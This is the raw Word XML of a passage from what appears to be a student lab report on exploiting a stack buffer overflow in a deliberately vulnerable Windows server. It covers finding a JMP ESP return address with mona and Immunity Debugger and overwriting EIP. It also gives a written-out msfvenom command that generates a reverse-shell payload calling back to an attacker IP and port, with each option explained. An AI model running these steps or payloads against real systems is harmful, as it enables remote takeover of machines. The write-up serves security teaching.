        </w:rPr>
        <w:t>5.3: Using nasm_shell to find opcode equivalent of JMP EST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC506FC" w14:textId="31AA02F9" w:rsidR="00907C61" w:rsidRDefault="00907C61" w:rsidP="00907C61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>On immunity Debugger, mona is run again but this time with the command “</w:t>
      </w:r>
      <w:r w:rsidRPr="00907C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>!mona find -s “\xff\x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00907C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4” -m essfunc.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">”. </w:t>
      </w:r>
      <w:r w:rsidR="00AD50A7">
        <w:t>The \xff\xe4 is opcode for JMP ESP .The</w:t>
      </w:r>
      <w:r w:rsidRPr="00907C61">
        <w:t xml:space="preserve"> displayed </w:t>
      </w:r>
      <w:r w:rsidR="00AD50A7">
        <w:t xml:space="preserve">items </w:t>
      </w:r>
      <w:r w:rsidRPr="00907C61">
        <w:t>are the return addresses linked to the essfunc.dll and lists all its mem</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00907C61">
        <w:t>ry protections</w:t>
      </w:r>
      <w:r w:rsidR="00AD50A7">
        <w:t xml:space="preserve"> [Figure5.4].These return addresses are pushed onto the stack when the dll is called and is where the shellcode will be stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7958EF4E" w14:textId="5989649B" w:rsidR="00907C61" w:rsidRPr="00907C61" w:rsidRDefault="00907C61" w:rsidP="00907C61">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06E57291" wp14:editId="4D3647E7">
            <wp:extent cx="6105525" cy="1962464"/>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83313" cy="1987467"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF1D768" w14:textId="6F768D16" w:rsidR="00907C61" w:rsidRDefault="00907C61" w:rsidP="00907C61">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Using mona commands to find Return Addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212F68D7" w14:textId="32D5B59B" w:rsidR="00907C61" w:rsidRDefault="00907C61" w:rsidP="00907C61">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA4C94F" w14:textId="0D4252C6" w:rsidR="00907C61" w:rsidRDefault="00AD50A7" w:rsidP="00907C61">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00B04B29">
        <w:t>address of the 1</w:t>
      </w:r>
      <w:r w:rsidR="00B04B29" w:rsidRPr="00B04B29">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="00B04B29">
        <w:t xml:space="preserve"> item displayed on immunity is added</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into the script as shown below [Figure 5.5]</w:t>
      </w:r>
      <w:r w:rsidR="00220A2F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772487BA" w14:textId="64ADCD12" w:rsidR="00AD50A7" w:rsidRDefault="00AD50A7" w:rsidP="00907C61">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A1959B7" wp14:editId="2857AFF2">
            <wp:extent cx="4086225" cy="22519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4124761" cy="2273153"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF957C5" w14:textId="06339EBF" w:rsidR="00220A2F" w:rsidRDefault="00220A2F" w:rsidP="00D47184">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shellScript3.py showing inserted JMP Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52316133" w14:textId="385241A9" w:rsidR="00B04B29" w:rsidRDefault="00D47184" w:rsidP="00D47184">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">he 4 B’s used to find the EIP have been replaced with the pointer 625011af in little endian format. This will make the EIP a JMP code which </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">point to </w:t>
      </w:r>
      <w:r w:rsidR="009F30FD">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>malicious code. This jump point can be caught</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Immunity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by setting a breakpoint using the pointer (625011af) [Figure 5.6]</w:t>
      </w:r>
      <w:r w:rsidR="00B04B29">
        <w:t xml:space="preserve"> and running the script</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F7B7CC" w14:textId="0BAC6E71" w:rsidR="00D47184" w:rsidRDefault="00D47184" w:rsidP="00D47184">
      <w:r>
        <w:t>With the breakpoint set, when the buffer is overflowed but hits the specific spot in which the breakpoint is set, it will not jump but rather crash the VulnApp application, pause and await further instructions from the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00B04B29">
        <w:t xml:space="preserve"> [Figure 5.7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5982E06F" w14:textId="04078C70" w:rsidR="00D47184" w:rsidRDefault="00D47184" w:rsidP="00D47184">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C0BC8EC" wp14:editId="22CC04B3">
            <wp:extent cx="4984534" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="698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10126" cy="2363129"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3523F64D" w14:textId="379CD0A1" w:rsidR="00D47184" w:rsidRDefault="00D47184" w:rsidP="00D47184">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B04B29">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Inserting Breakpoints Using Pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C1D52" w14:textId="2B0C931D" w:rsidR="00220A2F" w:rsidRDefault="00B04B29" w:rsidP="00220A2F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77961BAB" wp14:editId="1C573870">
            <wp:extent cx="3771367" cy="192405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3807668" cy="1942570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2004A1F5" w14:textId="68770C29" w:rsidR="00B04B29" w:rsidRDefault="00B04B29" w:rsidP="00B04B29">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Immunity recording breakpoint at essfunc</w:t>
      </w:r>
      <w:r w:rsidR="003E6A7E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.625011AF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72232B5E" w14:textId="26597386" w:rsidR="003E6A7E" w:rsidRDefault="003E6A7E" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6A7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Generating The Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4FA129" w14:textId="226CA11B" w:rsidR="003E6A7E" w:rsidRDefault="003E6A7E" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E6A7E">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>To generate a shellcode, the tool msfvenom by Metasploit will be used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to generate the payload. Using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D614B11" w14:textId="7D20681E" w:rsidR="0007596F" w:rsidRDefault="0007596F" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007596F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="003E6A7E" w:rsidRPr="0007596F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>sfvenom -p windows/shell_reverse_tcp LHOST=”192.168.56.10</w:t>
      </w:r>
      <w:r w:rsidRPr="0007596F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>6” LPORT=49152 EXITFUNC=thread -f c -a x86 -b “\x00”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F472FB9" w14:textId="3C6D4A85" w:rsidR="0007596F" w:rsidRDefault="0007596F" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007596F">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">where </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidRPr="0007596F">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D0B59F" w14:textId="20895E7C" w:rsidR="0007596F" w:rsidRDefault="0007596F" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>windows/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> sets payload to windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E42D469" w14:textId="77D47CB6" w:rsidR="0007596F" w:rsidRDefault="0007596F" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>/shell_reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is a non-staged reverse shell that allows the victim machine to connect back to target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC15385" w14:textId="76646FA8" w:rsidR="0007596F" w:rsidRDefault="0007596F" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> attack machine address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061C8362" w14:textId="43635251" w:rsidR="0007596F" w:rsidRDefault="0007596F" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>EXITFUNC=thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> makes exploit stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459C55A" w14:textId="73D3D72E" w:rsidR="0007596F" w:rsidRDefault="0007596F" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is for the filetype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F2FC3E" w14:textId="69940751" w:rsidR="0007596F" w:rsidRDefault="002C4BC1" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="0007596F">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is to export to C language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AADE9C7" w14:textId="0ACBF3BD" w:rsidR="0007596F" w:rsidRDefault="0007596F" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is to select architecture type, in this case it’s an x86</w:t>
      </w:r>
      <w:r w:rsidR="002C4BC1">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770D2F22" w14:textId="11AA1888" w:rsidR="0007596F" w:rsidRDefault="0007596F" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>-b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is for bad characters</w:t>
      </w:r>
      <w:r w:rsidR="002C4BC1">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457BD32D" w14:textId="77777777" w:rsidR="002C4BC1" w:rsidRPr="0007596F" w:rsidRDefault="002C4BC1" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50B1B093" w14:textId="11BA7302" w:rsidR="003E6A7E" w:rsidRDefault="002C4BC1" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">When that completes running, a shell code will be generated and </w:t>
      </w:r>
      <w:r w:rsidR="003E6A7E">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>added to a new python script. [Figure 6.1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FF90F9" w14:textId="2997748C" w:rsidR="003E6A7E" w:rsidRPr="003E6A7E" w:rsidRDefault="003E6A7E" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="325EE8D1" wp14:editId="2B1AB5F1">
            <wp:extent cx="5842660" cy="4202615"/>
            <wp:effectExtent l="0" t="0" r="5715"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11459" cy="4252102"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F22B32" w14:textId="22678CCC" w:rsidR="002C4BC1" w:rsidRDefault="002C4BC1" w:rsidP="002C4BC1">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Script </w:t>
      </w:r>
      <w:r w:rsidR="002358C6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>With generated msfvenom shell code for Root Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266676AA" w14:textId="5D93DE5A" w:rsidR="006A13EC" w:rsidRDefault="006A13EC" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>In the script above, a variable bufferOverflow is declared and assigned the generated shell code copied from msfvenom. The shellcode variable still holds the string of 2003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> A’s plus the pointer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>address,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> which is the JMP address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> new variable bufferOverflow which holds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> shellcode. Nops</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="002358C6">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>-Operation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> are included to provide padding between the JMP command and the overflow variable to prevent any instances where command execution doesn’t take place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5366E6FF" w14:textId="77777777" w:rsidR="006A13EC" w:rsidRDefault="006A13EC" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D684E38" w14:textId="77777777" w:rsidR="006A13EC" w:rsidRDefault="006A13EC" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625B2DAD" w14:textId="77777777" w:rsidR="006A13EC" w:rsidRDefault="006A13EC" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E377DB" w14:textId="50EF1058" w:rsidR="002358C6" w:rsidRDefault="006A13EC" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002358C6">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Before </w:t>
      </w:r>
      <w:r w:rsidR="002358C6">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">running </w:t>
      </w:r>
      <w:r w:rsidRPr="002358C6">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">this script, a netcat </w:t>
      </w:r>
      <w:r w:rsidR="002358C6">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>connection</w:t>
      </w:r>
      <w:r w:rsidRPr="002358C6">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to VulnApp is open</w:t>
      </w:r>
      <w:r w:rsidR="002358C6">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="009F30FD">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002358C6">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>so the attacking machine can listen on the port.</w:t>
      </w:r>
      <w:r w:rsidRPr="002358C6">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E52DB74" w14:textId="77777777" w:rsidR="009F30FD" w:rsidRDefault="009F30FD" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA3843D" w14:textId="32CCEBD0" w:rsidR="006A13EC" w:rsidRPr="002358C6" w:rsidRDefault="002358C6" w:rsidP="003E6A7E">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
